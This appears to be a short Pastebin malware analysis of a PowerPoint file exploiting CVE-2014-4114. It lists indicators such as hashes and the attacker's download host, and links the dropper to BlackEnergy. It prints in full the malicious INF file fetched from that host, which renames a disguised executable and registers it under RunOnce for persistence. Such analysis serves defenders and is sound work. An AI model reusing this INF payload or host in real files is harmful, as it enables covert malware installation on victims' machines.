Advertisement
Snakelabs

CVE-2014-4114

Oct 14th, 2014
3,709
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.49 KB | None | 0 0
  1. quick and dirty analysis of PPTX using CVE-2014-4114:
  2.  
  3. sample of the file thanks to @artem_i_baranov pptx/pptsx.
  4. https://www.virustotal.com/en/file/70b8d220469c8071029795d32ea91829f683e3fbbaa8b978a31a0974daee8aaf/analysis/
  5.  
  6. after opening the 2 of the following files are being download:
  7. hxxp://94[.]185[.]85[.]122/public/slide1[.]gif MD5: 8a7c30a7a105bd62ee71214d268865e3
  8. https://www.virustotal.com/en/file/0fda6c118fb7dc946440cb9225e32ab1825d87d4f088bb75a6eab7cef35433bc/analysis/
  9.  
  10. 94.185.85.122/public/slides.inf MD5: 8313034e9ab391df83f6a4f242ec5f8d
  11. content of slides.inf:
  12. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  13. ; 61883.INF
  14. ; Copyright (c) Microsoft Corporation. All rights reserved.
  15.  
  16. [Version]
  17. Signature = "$CHICAGO$"
  18. Class=61883
  19. ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17}
  20. Provider=%Msft%
  21. DriverVer=06/21/2006,6.1.7600.16385
  22.  
  23. [DestinationDirs]
  24. DefaultDestDir = 1
  25.  
  26. [DefaultInstall]
  27. RenFiles = RxRename
  28. AddReg = RxStart
  29.  
  30. [RxRename]
  31. slide1.gif.exe, slide1.gif
  32. [RxStart]
  33. HKLM,Software\Microsoft\Windows\CurrentVersion\RunOnce,Install,,%1%\slide1.gif.exe
  34. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  35.  
  36. It seems that the author of this attack worked hard to develop it but then used highly detected dropper, seems to be related to black energy:
  37. http://www.eset.com/int/about/press/articles/article/eset-research-ukraine-and-poland-targeted-by-sophisticated-blackenergy-trojan/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement